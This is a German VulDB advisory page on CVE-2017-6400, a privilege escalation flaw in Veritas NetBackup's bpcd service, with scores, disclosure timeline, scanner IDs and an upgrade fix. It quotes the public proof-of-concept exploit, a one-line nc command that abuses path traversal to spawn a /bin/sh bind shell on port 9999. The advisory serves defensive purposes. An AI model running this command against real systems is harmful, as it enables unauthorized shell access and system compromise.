| CVSS Meta Temp Score | Aktueller Exploitpreis (≈) | CTI Interest Score |
|---|---|---|
| 7.6 | $0-$5k | 0.00 |
Zusammenfassung
Es wurde eine problematische Schwachstelle in Veritas NetBackup 6.x/7.x ausgemacht. Es geht dabei um eine nicht klar definierte Funktion der Komponente bpcd. Dank der Manipulation mit unbekannten Daten kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Diese Schwachstelle wird als CVE-2017-6400 gehandelt. Der Angriff kann über das Netzwerk passieren. Ausserdem ist ein Exploit verfügbar. Es wird empfohlen, die betroffene Komponente zu aktualisieren.
Details
Eine Schwachstelle wurde in Veritas NetBackup 6.x/7.x (Backup Software) entdeckt. Sie wurde als kritisch eingestuft. Davon betroffen ist unbekannter Code der Komponente bpcd. Mittels dem Manipulieren mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Klassifiziert wurde die Schwachstelle durch CWE als CWE-264. Die Auswirkungen sind bekannt für Vertraulichkeit, Integrität und Verfügbarkeit. Die Zusammenfassung von CVE lautet:
An issue was discovered in Veritas NetBackup Before 7.7.2 and NetBackup Appliance Before 2.7.2. Privileged command execution on NetBackup Server and Client can occur (on the local system).Die Schwachstelle wurde am 01.03.2017 durch Sven Blumenstein, Xiaoran Wang und Andrew Griffiths von Google als Veritas NetBackup v6.x, v7.x, v8.0 and NetBackup appliances v2.x, v3.0 - Multiple Critical Vulnerabilities in Form eines nicht definierten Mailinglist Posts (Full-Disclosure) herausgegeben. Das Advisory findet sich auf seclists.org. Eine Veröffentlichung wurde nicht in Zusammenarbeit mit Veritas angestrebt. Die Verwundbarkeit wird mit der eindeutigen Identifikation CVE-2017-6400 gehandelt. Umgesetzt werden muss der Angriff lokal. Das Ausnutzen erfordert eine einfache Authentisierung. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. Diese Schwachstelle wird durch das MITRE ATT&CK als Angriffstechnik T1068 bezeichnet. Das Advisory weist darauf hin:
Multiple critical vulnerabilities were identified in Veritas NetBackup and NetBackup appliance. The vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.Ein öffentlicher Exploit wurde durch Sven Blumenstein/Xiaoran Wang/Andrew Griffiths entwickelt und sofort nach dem Advisory veröffentlicht. Unter seclists.org wird der Exploit zum Download angeboten. Er wird als proof-of-concept gehandelt. Es dauerte mindestens 92 Tage, bis diese Zero-Day Schwachstelle öffentlich gemacht wurde. Während dieser Zeit erzielte er wohl etwa $0-$5k auf dem Schwarzmarkt. Für den Vulnerability Scanner Nessus wurde ein Plugin mit der ID 104888 (Veritas NetBackup Appliance < 2.7.2 / 3.1.0 Multiple Vulnerabilities (VTS17-003)) herausgegeben, womit die Existenz der Schwachstelle geprüft werden kann. Es wird der Family CGI abuses zugeordnet. Der kommerzielle Vulnerability Scanner Qualys bietet das Plugin 370336 (Veritas NetBackup Multiple Vulnerabilities.(VTS17-003)) zur Prüfung der Schwachstelle an. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
echo -ne "-437860936\x00\x00\x00\x31\x00\x00\x00O/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc foo -lp 9999 -e/bin/sh" | nc 127.0.0.1 13782
Ein Aktualisieren auf die Version 8.0 vermag dieses Problem zu lösen. Das Advisory stellt fest:
The target date for patches that fix these issues is 29th September, 2017.Unter anderem wird der Fehler auch in den Datenbanken von Tenable (104888) und SecurityFocus (BID 96484†) dokumentiert. Schwachstellen ähnlicher Art sind dokumentiert unter VDB-97354, VDB-97356, VDB-97357 und VDB-97358. Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Betroffen
- Veritas NetBackup Appliance 6.x/7.x
- Veritas NetBackup Appliances 2.x
Produkt
Typ
Hersteller
Name
Version
Lizenz
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Zuverlässigkeit: 🔍
CVSSv3
VulDB Meta Base Score: 9.2VulDB Meta Temp Score: 8.7
VulDB Base Score: 8.8
VulDB Temp Score: 7.3
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
Hersteller Base Score (Veritas): 9.9
Hersteller Vector (Veritas): 🔍
NVD Base Score: 8.8
NVD Vector: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vektor | Komplexität | Authentisierung | Vertraulichkeit | Integrität | Verfügbarkeit |
|---|---|---|---|---|---|
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍
NVD Base Score: 🔍
Exploiting
Klasse: Erweiterte RechteCWE: CWE-264
CAPEC: 🔍
ATT&CK: 🔍
Physisch: Teilweise
Lokal: Ja
Remote: Ja
Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Proof-of-Concept
Autor: Sven Blumenstein/Xiaoran Wang/Andrew Griffiths
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍
| 0-Day | freischalten | freischalten | freischalten | freischalten |
|---|---|---|---|---|
| Heute | freischalten | freischalten | freischalten | freischalten |
Nessus ID: 104888
Nessus Name: Veritas NetBackup Appliance < 2.7.2 / 3.1.0 Multiple Vulnerabilities (VTS17-003)
Nessus Datei: 🔍
Nessus Family: 🔍
Qualys ID: 🔍
Qualys Name: 🔍
Threat Intelligence
Interesse: 🔍Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍
Gegenmassnahmen
Empfehlung: UpgradeStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Upgrade: NetBackup 8.0
Timeline
29.11.2016 🔍02.12.2016 🔍
01.03.2017 🔍
01.03.2017 🔍
01.03.2017 🔍
02.03.2017 🔍
19.04.2017 🔍
Quellen
Advisory: Veritas NetBackup v6.x, v7.x, v8.0 and NetBackup appliances v2.x, v3.0 - Multiple Critical VulnerabilitiesPerson: Sven Blumenstein, Xiaoran Wang, Andrew Griffiths
Firma: Google
Status: Nicht definiert
CVE: CVE-2017-6400 (🔍)
GCVE (CVE): GCVE-0-2017-6400
GCVE (VulDB): GCVE-100-97355
SecurityFocus: 96484
scip Labs: https://www.scip.ch/?labs.20161013
Siehe auch: 🔍
Eintrag
Erstellt: 01.03.2017 11:08Aktualisierung: 19.04.2017 10:34
Anpassungen: 01.03.2017 11:08 (69), 19.04.2017 10:34 (24)
Komplett: 🔍
Cache ID: 216::103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Bisher keine Kommentare. Sprachen: de + en.
Bitte loggen Sie sich ein, um kommentieren zu können.